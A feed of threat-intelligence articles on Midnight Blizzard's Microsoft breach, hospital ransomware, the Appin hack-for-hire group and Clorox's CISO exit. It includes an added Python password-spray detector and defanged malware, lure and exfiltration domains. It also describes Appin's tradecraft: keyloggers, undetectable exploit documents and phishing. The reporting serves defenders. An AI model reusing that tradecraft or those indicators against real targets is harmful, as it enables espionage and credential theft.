cyberattack - X-Industry - Red Sky Alliance (feed, 2024-03-19T05:16:40Z, https://redskyalliance.org/xindustry/feed/tag/cyberattack)

Microsoft’s Ongoing Cyber Attack
https://redskyalliance.org/xindustry/microsoft-s-ongoing-cyber-attack
2024-03-14T13:48:40.000Z, Mac McKee (https://redskyalliance.org/members/MacMcKee)
<div><p>A Microsoft spokesman reported that the Russian government-backed hacking team that broke into its corporate network and spied on senior executives also stole source code and may still be poking around its internal computer systems. In what is being described as an “ongoing attack,” the world’s largest software maker says it has evidence the hacking group “is using information initially exfiltrated from our corporate email systems to gain, or attempt to gain, unauthorized access.” This has included access to some of the company’s source code repositories and internal systems. The company did not provide any additional details on the source code access or which internal systems had been breached. “To date we have found no evidence that Microsoft-hosted customer-facing systems have been compromised,” the representative said.</p>
<p>Microsoft said it is apparent that Midnight Blizzard is still attempting to use secrets of different types that were shared between customers and Microsoft in email in additional attacks. “[As] we discover them in our exfiltrated email, we have been and are reaching out to these customers to assist them in taking mitigating measures,” the company said, warning that the hacking group has increased the volume of some aspects of the attack, such as password sprays, by as much as 10-fold in February, compared to the already large volume seen in January 2024.</p>
<p>See: <a href="https://redskyalliance.org/xindustry/microsoft-warns-of-apt29-espionage-attacks">https://redskyalliance.org/xindustry/microsoft-warns-of-apt29-espionage-attacks</a></p>
<p>“[The hackers] may be using the information it has obtained to accumulate a picture of areas to attack and enhance its ability to do so. This reflects what has become more broadly an unprecedented global threat landscape, especially in terms of sophisticated nation-state attacks,” the company said. The latest twist comes less than a month after the Midnight Blizzard hackers were <a href="https://www.securityweek.com/microsoft-says-russian-gov-hackers-stole-email-data-from-senior-execs/">caught in Microsoft’s corporate network spying on emails</a> and attachments from senior executives and targets in the cybersecurity and legal departments. </p>
<p>The APT, which has also been blamed for the SolarWinds supply chain hack, used a password spray attack to compromise a legacy non-production test tenant account and gain a foothold, and then used the account’s permissions to access a very small percentage of Microsoft corporate email accounts. “[They] exfiltrated some emails and attached documents,” Microsoft said in a <a href="https://www.sec.gov/Archives/edgar/data/789019/000119312524011295/d708866dex991.htm">filing</a> with the Securities and Exchange Commission (SEC).</p>
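<p>The foothold described above was a password spray: one or a few guesses tried across many accounts, which evades per-account lockout and only needs a single weak, unprotected account (here a legacy non-production test tenant) to land. The following is an added example, not code from Red Sky Alliance, Microsoft or SecurityWeek, showing the detection logic a defender would run over sign-in telemetry. It assumes a simplified record format (timestamp, user, source IP, result) and uses constructed sample lines with documentation IP ranges; real identity-provider exports carry more fields, but the signal is the same: breadth of accounts from one source in a short window, not depth of attempts per account.</p>

```python
"""Password-spray detection over constructed sign-in records.

Added example (not code from Red Sky Alliance, Microsoft or SecurityWeek).
It assumes sign-in events of the form 'timestamp user source_ip RESULT';
real identity-provider exports carry more fields, but the signal is the
same: one source failing against many distinct accounts, few attempts per
account, in a short window.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log: 203.0.113.7 sprays one guess across many accounts
# and lands on a stale test account; 198.51.100.9 is a single user retrying
# their own password; 192.0.2.44 is a normal login. All addresses are
# documentation ranges, not real indicators.
SAMPLE_LOG = """\
2024-01-12T03:00:01Z alice 203.0.113.7 FAILURE
2024-01-12T03:00:03Z bob 203.0.113.7 FAILURE
2024-01-12T03:00:05Z carol 203.0.113.7 FAILURE
2024-01-12T03:00:07Z dave 203.0.113.7 FAILURE
2024-01-12T03:00:09Z erin 203.0.113.7 FAILURE
2024-01-12T03:00:11Z frank 203.0.113.7 FAILURE
2024-01-12T03:00:13Z test-legacy 203.0.113.7 SUCCESS
2024-01-12T03:05:00Z grace 198.51.100.9 FAILURE
2024-01-12T03:05:10Z grace 198.51.100.9 FAILURE
2024-01-12T03:05:20Z grace 198.51.100.9 FAILURE
2024-01-12T03:05:30Z grace 198.51.100.9 SUCCESS
2024-01-12T08:00:00Z alice 192.0.2.44 SUCCESS
"""


def parse_events(text):
    """Parse one record per line into dicts, sorted by time; skip malformed lines."""
    events = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue
        ts, user, ip, result = parts
        events.append({
            "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
            "user": user.lower(),
            "ip": ip,
            "ok": result == "SUCCESS",
        })
    return sorted(events, key=lambda e: e["ts"])


def detect_sprays(events, window=timedelta(minutes=10), min_users=5, max_per_user=2):
    """Return {source_ip: {"users": [...], "succeeded": [...]}} for sources whose
    failures inside some `window` cover at least `min_users` distinct accounts
    with no account failing more than `max_per_user` times (breadth, not depth).
    "succeeded" lists accounts that source logged into during or shortly after
    the spray window, which is the follow-up a responder most needs to know."""
    by_ip = defaultdict(list)
    for e in events:
        by_ip[e["ip"]].append(e)

    alerts = {}
    for ip, evs in by_ip.items():
        fails = [e for e in evs if not e["ok"]]  # already time-ordered
        best = None  # (distinct users, window start, window end)
        start = 0
        for end in range(len(fails)):
            # slide the window start forward until it fits inside `window`
            while fails[end]["ts"] - fails[start]["ts"] > window:
                start += 1
            per_user = defaultdict(int)
            for e in fails[start:end + 1]:
                per_user[e["user"]] += 1
            if len(per_user) >= min_users and max(per_user.values()) <= max_per_user:
                if best is None or len(per_user) > len(best[0]):
                    best = (set(per_user), fails[start]["ts"], fails[end]["ts"])
        if best is None:
            continue
        users, w_start, w_end = best
        succeeded = sorted({e["user"] for e in evs
                            if e["ok"] and w_start <= e["ts"] <= w_end + window})
        alerts[ip] = {"users": sorted(users), "succeeded": succeeded}
    return alerts


if __name__ == "__main__":
    for ip, hit in detect_sprays(parse_events(SAMPLE_LOG)).items():
        print(f"spray from {ip}: {len(hit['users'])} accounts tried, "
              f"successful logins: {hit['succeeded'] or 'none'}")
```

<p>On the constructed sample only 203.0.113.7 is flagged: six distinct accounts failed once each within ten seconds, and the same source then succeeded against the stale test account, which is exactly the pattern to escalate. The single user retrying her own password is not flagged, because the rule requires breadth across accounts rather than repeated failures on one. The thresholds are assumptions to tune per tenant; the more durable lesson from the Microsoft case is that every tenant, including legacy and non-production ones, needs the same MFA and conditional-access baseline, because the spray only has to find one that does not.</p>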
<p>The company said its security team detected the nation-state attack on its corporate systems on January 12, 2024 and traced the infection back to November 2023. The discovery of Russian hackers in Microsoft’s network comes less than six months after <a href="https://www.securityweek.com/chinese-cyberspies-used-forged-authentication-tokens-to-hack-government-emails/">Chinese cyber spies were caught</a> forging authentication tokens using a stolen Azure AD enterprise signing key to break into M365 email inboxes. </p>
<p>That hack, which <a href="https://www.securityweek.com/microsoft-cloud-hack-exposed-more-than-exchange-outlook-emails/">led to the theft of email data</a> from approximately 25 government organizations in the United States, is currently being investigated by the CISA Cyber Security Review Board (CSRB). Midnight Blizzard/Nobelium (known to others as APT29 and Cozy Bear) is the same group blamed for hacking IT management solutions provider <a href="https://www.securityweek.com/continuous-updates-everything-you-need-know-about-solarwinds-attack/">SolarWinds</a> in a massive supply chain attack in 2020.</p>
<p>This article is presented at no charge for educational and informational purposes only.</p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments or assistance, please contact the office directly at 1-844-492-7225, or <a href="mailto:feedback@wapacklabs.com">feedback@redskyalliance.com</a></p>
<ul>
<li>Reporting: <a href="https://www.redskyalliance.org/">https://www.redskyalliance.org/</a></li>
<li>Website: <a href="https://www.redskyalliance.com/">https://www.redskyalliance.com/</a></li>
<li>LinkedIn: <a href="https://www.linkedin.com/company/64265941">https://www.linkedin.com/company/64265941</a></li>
</ul>
<p>Weekly Cyber Intelligence Briefings:</p>
<p>REDSHORTS - Weekly Cyber Intelligence Briefings</p>
<p><a href="https://attendee.gotowebinar.com/register/5504229295967742989">https://attendee.gotowebinar.com/register/5504229295967742989</a></p>
<p><span style="font-size:8pt;"><a href="https://www.securityweek.com/microsoft-says-russian-gov-hackers-stole-source-code-after-spying-on-executive-emails/">https://www.securityweek.com/microsoft-says-russian-gov-hackers-stole-source-code-after-spying-on-executive-emails/</a></span></p>
</div>

Cyber-Attacks on Hospitals
https://redskyalliance.org/xindustry/cyber-attacks-on-hospitals
2024-02-26T17:00:00.000Z, Jim McKee (https://redskyalliance.org/members/JimMcKee)
<div><p>Cybersecurity experts are warning that hospitals around the country are at risk for attacks like the one that is crippling operations at a premier Midwestern children’s hospital and that the US government is doing too little to prevent such breaches. Hospitals in recent years have shifted their use of online technology to support everything from telehealth to medical devices to patient records. Today, they are a favorite target for internet thieves who hold systems’ data and networks hostage for hefty ransoms, said John Riggi, the American Hospital Association’s cybersecurity adviser. “Unfortunately, the unintended consequence of using all this network- and internet-connected technology is that it expanded our digital attack surface,” Riggi said. “So, many more opportunities for bad guys to penetrate our networks.”<a href="#_ftn1">[1]</a></p>
<p>See: <a href="https://redskyalliance.org/xindustry/hive-hospitals">https://redskyalliance.org/xindustry/hive-hospitals</a></p>
<p>The assailants often operate from countries that are American adversaries, such as Russia, North Korea, and Iran, where they enjoy big payouts from their victims and face little prospect of ever being punished. In November 2023, a ransomware attack on a healthcare chain that operates 30 hospitals and 200 health facilities in the United States forced doctors to divert patients from emergency rooms and postpone elective surgeries. Meanwhile, a rural Illinois hospital announced it was permanently closed last year because it could not recover financially from a cyberattack. The hackers went as far as posting photos and patient information of breast cancer patients who were receiving treatment at a Pennsylvania health network after the system was hacked last year.</p>
<p>Recently, one of the top children’s hospitals in the country, the Ann & Robert H. Lurie Children’s Hospital of Chicago, has been forced to put its phone, email, and medical record systems offline as it battles a cyberattack. The FBI has said it is investigating. Brett Callow, an analyst for the cybersecurity firm Emsisoft, counted 46 cyberattacks on hospitals last year, compared with 25 in 2022. The paydays for criminals have gotten bigger, too, with the average payout jumping from $5,000 in 2018 to $1.5 million last year. “Unless governments do something more meaningful, more significant than they have done to date, it’ll inevitably get worse,” Callow said.</p>
<p>Callow believes the government should ban cyberattack victims such as hospitals, local governments and schools from paying ransoms. “There’s so much money being paid into the ransomware system now there’s no way the problem is going to go away on itself simply,” he said. The dramatic increase in these online raids has prompted the nation’s top health agency to develop new rules for hospitals to protect themselves from cyber threats.</p>
<p>The Department of Health and Human Services said that later this year it will rewrite the rules for the Health Insurance Portability and Accountability Act, the federal law commonly called HIPAA that requires insurers and health systems to protect patient information, to include new provisions that address cybersecurity. The department is also considering new cybersecurity requirements attached to hospitals’ Medicaid and Medicare funding.</p>
<p>Most hospitals will struggle to protect themselves. Experts are worried about rural hospitals, for example, that may have difficulty cobbling together money to update their cybersecurity properly. HHS wants more money from Congress to tackle the issue, but Palm said the agency doesn’t have a precise dollar amount it seeks. Becoming the victim of a cyberattack is costly, too. The attacks can put hospitals’ networks offline for weeks or months, forcing hospitals to turn away patients.</p>
<p>In Chicago, Lurie Hospital’s network has been offline for two weeks. The hospital, which served more than 260,000 patients last year, has established a separate call center for patients’ needs and resumed some care. </p>
<p><strong>Weekly Cyber Intelligence Briefings:</strong></p>
<p>REDSHORTS - Weekly Cyber Intelligence Briefings</p>
<p><a href="https://attendee.gotowebinar.com/register/5993554863383553632">https://attendee.gotowebinar.com/register/5993554863383553632</a></p>
<p><a href="#_ftnref1">[1]</a> <a href="https://www.securityweek.com/cyberattacks-on-hospitals-are-likely-to-increase-putting-lives-at-risk-experts-warn/">https://www.securityweek.com/cyberattacks-on-hospitals-are-likely-to-increase-putting-lives-at-risk-experts-warn/</a></p></div>

Elephant Hunting
https://redskyalliance.org/xindustry/elephant-hunting
2023-12-01T17:33:55.000Z, CyberDog (https://redskyalliance.org/members/CyberDog189)
<div><p>Our friends at SentinelLabs report that Hack-for-Hire threat actors go by many names, such as surveillance-for-hire, mercenaries, private-sector-offensive-actors (PSOAs), and nonstate offensive threat actors. Such groups represent an exciting challenge for security researchers and network defenders. They should be considered a severe threat to all organizations, worthy of proactive tracking in ongoing intrusions and analysis of historical cases to understand their significant impacts. Many public industry reports have highlighted attempts to track and disrupt mercenary threat actors, including our past <a href="https://www.sentinelone.com/labs/the-sprawling-infrastructure-of-a-careless-mercenary/">work on Void Balaur</a> and <a href="https://about.fb.com/wp-content/uploads/2022/12/Threat-Report-on-the-Surveillance-for-Hire-Industry.pdf">Meta’s Surveillance-for-Hire report</a>.</p>
<p>Below, SentinelLabs shares findings from a review of highly unique, non-public, and technically verified data on the hack-for-hire efforts of the Appin business. After an extensive review of this data, brought to our attention by <a href="https://www.reuters.com/investigates/special-report/usa-hackers-appin/">Reuters</a> investigative journalists, we assess with high confidence that it correlates with previously known Appin intrusions, accurately depicts internal communications, and originated from inside the security arm of the Appin organization, formally known as Appin Software Security and informally as Appin Security Group (ASG).<a href="#_ftn1">[1]</a></p>
<p>Introduction to Appin - Appin is considered the original hack-for-hire company in India, offering an offensive security training program alongside covert hacking operations since at least 2009. Their past employees have since spread to form newer competitors and partners, evolving the Appin brand to include new names, while some have spread into cybersecurity defense industry vendors. Appin was so prolific that a surprising amount of current Indian APT activity still links back to the original Appin group of companies in one form or another. Campaigns conducted by Appin have revealed a noteworthy customer base of government organizations and private businesses spread globally.</p>
<p>Our analysis and observations corroborate the <a href="https://www.reuters.com/investigates/special-report/usa-hackers-litigation/">June 2022 reporting from Reuters</a>, noting some of Appin’s customers are tied to significant litigation battles. The group has conducted hacking operations against high-value individuals, governmental organizations, and other businesses involved in specific legal disputes. Appin’s hacking operations and overall organization often appear informal, clumsy, and technically crude; however, their operations proved highly successful for their customers, impacting world affairs significantly.</p>
<p>Victims and Links to Previous Reporting - The extensive scope of unique targets and confirmed victims extends globally. The data reveals victims across the United States, Canada, China, India, Myanmar, Kuwait, Bangladesh, the United Arab Emirates, Pakistan, and other locations. The affected devices encompass those affiliated with both governmental entities and businesses across various industries. It is important to note that the aforementioned list is not exhaustive, serving as a snapshot at a particular moment rather than a comprehensive compilation of all targets and victims.</p>
<p><em>Victim Beacon Source IPs Visualized</em></p>
<p>From a threat intelligence perspective, the data includes identifying specific victims of notable public interest. Attacks on China and Pakistan from India-linked threat actors are not new; however, the confirmation that a local Indian hack-for-hire group was enlisted to conduct these campaigns is insightful on the attribution of presumably state-sponsored attacks out of India. We can confirm some known victimology as well as observe additional previously undiscovered victims:</p>
<p>Pakistani Government Officials - These victims were successfully compromised and sent keylogger data from their machines to the Appin-owned and controlled server. The keylogger data contained personal social media and email account logins, government website logins, and more mundane web browsing like travel, games, and pornography sites. Pakistani targeting continued in the years following, as <a href="https://www.welivesecurity.com/2013/05/16/targeted-threat-pakistan-india/">reported by ESET in 2013</a> and noted in the below Operation Hangover report.</p>
<p>Chinese Government Officials - Multiple cases in 2009 involved data theft operations against Chinese government officials. These include the successful compromise of multiple PLA officers. Around the same time, operators successfully compromised Military Liaison Officers with the same objective. Notably, these attacks were carried out shortly after <a href="https://web.archive.org/web/20091105083349/https:/timesofindia.indiatimes.com/india/china-mounts-cyber-attacks-on-indian-sites/articleshow/3010288.cms">Indian government officials</a> made public statements they had observed cyber attacks on Indian government networks and attributed the activity to China.</p>
<p>Domestic Targeting - There are also many cases of domestic targeting. For example, in one case, the Intelligence organization within a local police force enlisted Appin to conduct defacement attacks on specific Sikh websites and to steal login credentials of email accounts belonging to Sikhs in India and the US. One such inbound request reviewed contained a formal request document for Appin to break into the personal Gmail account of a specific individual labeled as a domestic terrorist target. In an unrelated campaign, the group also used the domain speedaccelator[.]com for an FTP server, hosting malware used in their malicious phishing emails, one of which was used on <a href="https://www.sentinelone.com/labs/modifiedelephant-apt-and-a-decade-of-fabricating-evidence/">an Indian individual later targeted by the ModifiedElephant APT</a>.</p>
<p>KitM Mac Spyware - In 2013, F-Secure analyzed and reported (<a href="https://archive.f-secure.com/weblog/archives/00002554.html">1</a>,<a href="https://archive.f-secure.com/weblog/archives/00002558.html">2</a>,<a href="https://archive.f-secure.com/weblog/archives/00002559.html">3</a>) on the technical details of Mac spyware initially discovered on the machine of an Angolan activist while visiting the Oslo Freedom Forum (“a global gathering of activists united in standing up to tyranny.”). This Mac spyware was quite unique at the time, and ultimately dubbed KitM (‘Kumar in the Mac’, referring to the certificate issued under the name ‘Rajinder Kumar’, used to sign all of the samples), and used Appin-owned and operated infrastructure. The newly reviewed data provided some of the context behind this campaign and confirmed actor attribution to Appin.</p>
<p>Operation Hangover - One of the more interesting links to previous reporting is the overlap with <a href="https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2013/NS-Unveiling-an-Indian-Cyberattack-Infrastructure_FINAL_Web.pdf">Operation Hangover</a>. This 2013 report was a unique deep dive into threat activity around an industrial espionage campaign against the Norwegian telecommunications corporation Telenor and other private companies. The authors note multiple strong links between the Appin organization and the attacks observed in the wild. Our new findings confirm that the malware and attack infrastructure noted in the Operation Hangover report were owned and controlled by Appin, such as taraanasongs[.]com and others highlighted here.</p>
<p>Below is a graphic depicting the process of acquiring Operation Hangover-related domains. In late October 2009, an operator requested a “new domain for phishing and exe upload” from their manager. After approval, the manager forwarded the request, which went to the executive staff and finance manager. A day later, the operator acknowledged the new domain (taraanasongs[.]com), and the manager informed the executive staff of its acquisition.</p>
<p><em>Appin Operator Requesting Purchase of taraanasongs[.]com</em></p>
<p>Infrastructure Acquisition and Use - Leading hack-for-hire organizations face essential segmentation requirements to limit the discovery of their infrastructure. If a researcher were to discover what connects all points of their infrastructure together, it would put the entire set of customer operations at risk. For years, Appin’s acquisition and management of infrastructure was handled through a particular outside contractor. At the time, this individual would register the domains and set up hosting solutions for a project as needed. Appin operators would request a server type, including some technical requirements, and state which operator was assigned to use it. The consultant would then purchase the server, set it up as instructed, provide credentials for remote access to the operator and Appin leadership, and conclude the interaction with an invoice detailing payment. Based on the data reviewed, the consultant made the purchases through a collection of repeated personal and business-branded email accounts, in addition to overlapping registration and hosting details.</p>
<p><em>Invoice to Appin for Malicious FTP Domains and VPS Servers</em></p>
<p>The types of servers requested generally centered around a handful of primary purposes.</p>
<p>Exfiltration – Often referred to as FTP or data transfer servers in the early years, these were the destinations to which malware uploaded stolen data. The logs of an Appin-owned and operated exfiltration server are also useful for victim identification. For example, as previously noted, those originating from devinmartin[.]net highlight a global victim spread. Data was uploaded to this specific FTP server with the following accounts:</p>
<ul>
<li>stealth@devinmartin[.]net</li>
<li>keylogs@devinmartin[.]net</li>
<li>radar@devinmartin[.]net</li>
<li>123456@devinmartin[.]net</li>
<li>devinmartin@devinmartin[.]net</li>
<li>revolution@devinmartin[.]net</li>
<li>devinmart@devinmartin[.]net</li>
<li>reloaded@devinmartin[.]net</li>
<li>cinema@devinmartin[.]net</li>
<li>lux@devinmartin[.]net</li>
</ul>
<p><em>Data Exfiltration Logs from the C2 server, with Victim IPs Redacted</em></p>
<p>C2 and Delivery Servers – Malware command and control, or hosting malware for download.</p>
<p><em>C2 / Delivery Server bluecreams[.]com and Linked Malware Visualized</em></p>
<p>Phishing – Hosted web pages for credential phishing. The same phishing pages were often available through multiple target-named subdomains and URLs.</p>
<p>Lure Sites – A fascinating technique was the use of referenced “honeypots.” These sites would often be themed around a specific topic and lure the target to interact for credential phishing or malware delivery. One such example is islam-jindabad.blogspot[.]com, which remains online at the time of this writing. It was created in 2009 and called a “honey pot” by Appin operators. The domain led to a second domain that delivered malware after clicking an image. The destination address of these images is gmail-loginchk.freehostia[.]com/raj1.php</p>
<p><em>Malicious Lure Site, Directs to Malware Download</em></p>
<p>VPS Server – Generic multi-purpose server for non-attributable access to victim machines and attack infrastructure administration, typically accessed through SSH. Additionally, a non-standard server type was used for Appin’s covert communications. The business used specific websites for customer project tracking and data sharing, variously referred to as GoldenEye, Commando, or MyCommando. It acted as a place where customers could log in to view and download campaign-specific data and status updates, communicate securely, and manage other aspects of their projects.</p>
<p><em>Covert Communications Login</em></p>
<p>This is the same “Secured Project Management Portal” highlighted in an Appin marketing presentation, <a href="https://www.documentcloud.org/documents/22065658-appin-efiia-pp">first shared by Reuters</a> in their June 2022 mercenary hacker investigative report.</p>
<p><em>Appin Marketing Document Showing Covert Communications Portal</em></p>
<p>Malware and Exploit Development - Appin used the California-based freelancing platform Elance (now known as Upwork) to purchase malware from external software developers, while using internal employees to develop those projects and their own tools. Appin posted Elance jobs under the username “appinsecuritygroup” and a profile set with an Appin executive's full name and appinonline[.]com email address. An example of Elance's use is the purchase of the USB Propagator tool from the freelancer “alexstinger.” The original job posting was titled “Creation of Advanced Data Backup Utility.” The same tool is also referenced in the Operation Hangover report. The original version was purchased in 2009 for $500 after troubleshooting and source code delivery. The Elance job statement was completed on July 15th, 2009.</p>
<p><em>Source files delivered by “alexstinger”</em></p>
<p><em>Snapshot of source code delivered by “alexstinger”</em></p>
<p>Appin advertised on Elance for many other software projects as well, including ones titled:</p>
<ul>
<li>Audio Recording Software on Windows</li>
<li>Creation of a code obfuscator for C, Visual C++</li>
<li>Exploits for research purposes on MS Office and IE</li>
<li>MS Office Exploits to upgrade our IPS/Antivirus!</li>
<li>R&D in vulnerability research in Eastern Europe</li>
</ul>
<p>A summary of the job post for “R&D in vulnerability research in Eastern Europe” shows the following.</p>
<table width="670">
<tbody>
<tr>
<td width="151">
<p>Description</p>
</td>
<td width="486">
<p>To outsource research in exploits and vulnerabilities on a monthly retainer basis to expert organizations in Eastern Europe</p>
</td>
</tr>
<tr>
<td width="151">
<p>Skills Required</p>
</td>
<td width="486">
<p>Vulnerability and Exploits Gathering, Exploit Development</p>
</td>
</tr>
<tr>
<td width="151">
<p>Focus/Deliverables</p>
</td>
<td width="486">
<p>Developing exploits on existing vulnerabilities or customization of exploit samples on the internet related to MS Office (Word, Excel, PowerPoint 2007/2003, etc), Adobe PDF, Browsers IE 6/7, Mozilla Firefox, and Opera.</p>
</td>
</tr>
<tr>
<td width="151">
<p>Minimum Expectation</p>
</td>
<td width="486">
<p>At least two exploits a month. Exploits should be customizable with payloads, Minimum detection from AV, and Weekly reports on successes/failures.</p>
</td>
</tr>
<tr>
<td width="151">
<p>Payment</p>
</td>
<td width="486">
<p>$1,000 monthly</p>
</td>
</tr>
</tbody>
</table>
<p>A recurring problem with these job postings was that freelancers quickly rejected them after noting the low payment amount and questioning whether they were intended for malicious use. Appin also used a large number of private spyware and exploit services over the years. For example, in 2010 they purchased mobile spyware services through Vervata, the business behind the FlexiSPY mobile stalkerware. When this transaction was conducted, the domain mobilebackup[.]biz was used by operators for installation guides, downloading software, and reviewing victim mobile device data. While this is historical data, FlexiSPY stalkerware is still marketed and sold today.</p>
<p><em>Archived snapshot of Vervata homepage, FlexiSPY product offering at the time</em></p>
<p><em>Archived Flexispy Login Portal 2010</em></p>
<p>Appin later pursued the purchase of exploits from leading private vendors at the time, including <a href="https://en.wikipedia.org/wiki/Vupen">Vupen</a> and Core Security. Business interests also involved the opportunity for Appin to act as an exploit reseller for Vupen to the Indian government.</p>
<p><em>Vupen and Appin Exploit Subscription Agreement Document</em></p>
<p>As noted, some malware was developed internally, including a keylogger. Associated data and communications reveal an employee's initial intention to share their development of the keylogger with Appin leadership in August 2009. In a reviewed message, the employee noted a new keylogger being built which could upload logs to the FTP server. Tests were conducted over the following weeks and months to showcase the keylogger’s capabilities. Below is one such file in which the developer tested the keylogger’s functionality, which was being detected by third-party antivirus solutions. The redacted data included the developer’s personal email address.</p>
<p><em>Keylogger Beaconing, Detected by AV</em></p>
<p>Months later the keylogger was being used in live operations, including in a campaign targeting the Pakistan government. Government victim data included personal email addresses and instant messaging activity, browsing for new jobs in the Pakistan Navy, reading/printing <a href="https://en.wikipedia.org/wiki/Inter-Services_Public_Relations">ISPR</a> news, and other personally sensitive online activity.</p>
<p>The Hack-For-Hire Business - Although hack-for-hire organizations in India and elsewhere have evolved markedly over the years as both the technology available to them and the ecosystem in which they operate have changed, a clear snapshot of Appin’s activity starting from around the early 2000s provides invaluable insight into the inner workings of such businesses. Ignoring Appin’s many business offerings related to network penetration testing, website security auditing, training, and more, we can focus on the part most interesting to cyber defenders and threat intelligence analysts: the hack-for-hire offerings. Below is a proposed offering of Appin’s ‘Special Services Division’ to India’s Chhattisgarh Police Cyber Investigation Cell.</p>
<p><em>Appin Special Services Division Offering (original text)</em></p>
<p>While a full review of the business structure is outside the scope of this report, a few relevant cybersecurity observations are useful to list: Offensive security services provided to customers well over a decade ago included data theft across many forms of technology, often internally referred to as “interception” services. These included keylogging, account credential phishing, website defacement, and SEO manipulation/disinformation. They would also accommodate other technical requests from a customer on-demand, such as cracking passwords from stolen documents.</p>
<p>Operations Security (OPSEC) was taken seriously in theory but inadequately executed in practice. Operators, developers, and leadership were disciplined not to discuss project specifics (targets, customers, tools, etc.) over weak communication channels. However, it appears that leadership itself repeatedly failed to abide by those standards. Examples include analysts refusing to write down confidential technical information related to sensitive operations while leadership openly discussed and documented the exact details.</p>
<p>The roles of individual operators are often built uniquely around their skill sets rather than formal responsibilities based on a structured role. This includes operators and developers mixing tasks depending on the individual’s interests and career tenacity. There is a strong, financially incentivized push from leadership to all individual operators and developers for innovative ideas that can better achieve success on behalf of their customers. This includes finding new tools and techniques to accomplish the desires of the customer. Some OPSEC gaps originate from the resulting unchecked innovation.</p>
<p>A Day in the Life - While the operator and developer roles proved fluid over time, we can glimpse the leadership’s priorities based on weekly task lists handed down to the early ‘development’ group. Tasks were assigned to individuals, including the following objectives:</p>
<ul>
<li>Individual A:
<ul>
<li>Build fully functional &amp; undetectable malicious documents using exploits.</li>
<li>Resolve issues of malware not collecting specific messaging software logs.</li>
<li>Coordinate with exploit developers (internal) for other ongoing campaigns.</li>
</ul>
</li>
<li>Individual B:
<ul>
<li>Build and finish the new network lateral movement solution.</li>
<li>Rebuild “FTP Backup trojan” to make it fully undetectable.</li>
</ul>
</li>
<li>Individual C:
<ul>
<li>Build a new process with exploit developers (internal) for weekly use of new fully-undetectable attack tools.</li>
<li>Troubleshoot phishing website problems, such as specific language characters not recording correctly.</li>
<li>Educate operators on other internal tools.</li>
</ul>
</li>
</ul>
<p>It’s ultimately unsurprising to learn of these tasks and the individuals assigned to them; however, they are useful when contextualizing the overlapping technical links and improvements between campaigns, such as version updates of the FTP Backup trojan.</p>
<p>Moving Forward - Our examination of the Indian hack-for-hire group Appin underscores the enduring and substantial threat posed by such entities to businesses, governments, and individuals over an extended period exceeding a decade. The research findings underscore the group’s remarkable tenacity and proven track record of successfully executing attacks on behalf of a diverse clientele. Our study's technical insights and infrastructure offer a valuable resource for mapping associated malicious activities and reevaluating past incidents with a renewed perspective.</p>
<p>The resilience of these groups, coupled with their capacity to attract new clients despite heightened public scrutiny, emphasizes the urgent need for enhanced international cooperation and the establishment of robust legal frameworks to address this escalating challenge effectively. In light of advancing technologies and the growing demand for digital espionage and cybercrime services, it is imperative for governments, businesses, and high-risk individuals to proactively implement measures to protect themselves against these formidable, adaptable, and thriving hack-for-hire threat actors.</p>
<p>Historical Indicators of Compromise - Note that some of the following indicators have since been used for legitimate purposes or sinkholed. Therefore, we advise caution if considering these as active indicators in their current state.</p>
<p><em>This article is presented at no charge for educational and informational purposes only.</em></p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments, or assistance, please get in touch with the office directly at 1-844-492-7225 or feedback@redskyalliance.com </p>
<p>Weekly Cyber Intelligence Briefings:</p>
<ul>
<li>Reporting: <a href="https://www.redskyalliance.org/">https://www.redskyalliance.org/</a></li>
<li>Website: <a href="https://www.redskyalliance.com/">https://www.redskyalliance.com/</a></li>
<li>LinkedIn: <a href="https://www.linkedin.com/company/64265941">https://www.linkedin.com/company/64265941</a></li>
</ul>
<p>REDSHORTS - Weekly Cyber Intelligence Briefings</p>
<p><a href="https://attendee.gotowebinar.com/register/5993554863383553632">https://attendee.gotowebinar.com/register/5993554863383553632</a></p>
<p><a href="#_ftnref1">[1]</a> <a href="https://www.sentinelone.com/labs/elephant-hunting-inside-an-indian-hack-for-hire-group/">https://www.sentinelone.com/labs/elephant-hunting-inside-an-indian-hack-for-hire-group/</a></p></div>
<p>Clorox's Cybersecurity Chief Departs (<a href="https://redskyalliance.org/xindustry/clorox-s-cybersecurity-chief-departs">https://redskyalliance.org/xindustry/clorox-s-cybersecurity-chief-departs</a>), 2023-11-24, Jim McKee (<a href="https://redskyalliance.org/members/JimMcKee">https://redskyalliance.org/members/JimMcKee</a>)</p>
<div><p>Recently, it was announced that the Clorox company’s CISO has stepped down from her position. Her departure comes as the company is still recovering from a devastating cyberattack that paralyzed its order fulfillment facilities for more than a month, leading to a 20% decline in net revenue in the first quarter of the fiscal year.</p>
<p>The reasons behind her departure have not been publicly disclosed. Still, her decision to step down during such a critical time for Clorox's cybersecurity efforts has raised concerns among experts and investors alike. Some speculate she may have been frustrated with the company's slow response to the cyberattack and its lack of investment in cybersecurity measures. Others suggest that she may have felt overwhelmed by the challenges of leading the company's cybersecurity efforts in the aftermath of such a significant breach.</p>
<p>See: <a href="https://redskyalliance.org/xindustry/clorox-woes">https://redskyalliance.org/xindustry/clorox-woes</a></p>
<p>As a public company, Clorox leaves its CISO with fiduciary duties in both fact and act (even if not explicitly stated). Noting this, leaders must be ready to confront the consequences of cybersecurity failures that inflict financial harm on investors. Conversely, if a CISO is to be held accountable like a CFO or General Counsel in matters of investor confidence, then the executive contours of the CISO role should be revisited to ensure that it has sufficient authority, agency, and institutional backing to defend data assets as a fiduciary.</p>
<p>Whatever the reasons for the departure, her exit is a setback for Clorox as it struggles with the ongoing fallout from the security incident and the increasing sophistication of cyber threats. The company now faces the task of finding a new CISO who can restore trust in its cybersecurity capabilities and lead the company into the future. And who wants the position, seeing what happened to the former CISO?</p>
<p>"Assuming she [sic] knew the environment was vulnerable before the incident, if she withheld this from the responsible executives, then she should be fired," said an independent consultant and former Security Assurance Director at The Walt Disney Company. "However, if she informed the executive committee of the risk and they accepted it by not acting, she should be rewarded. Unfortunately, sometimes, CIOs do not want CISOs to be transparent with the executive committee. The CISO implicitly accepts the risk and is rewarded for not rocking the boat until an incident happens."</p>
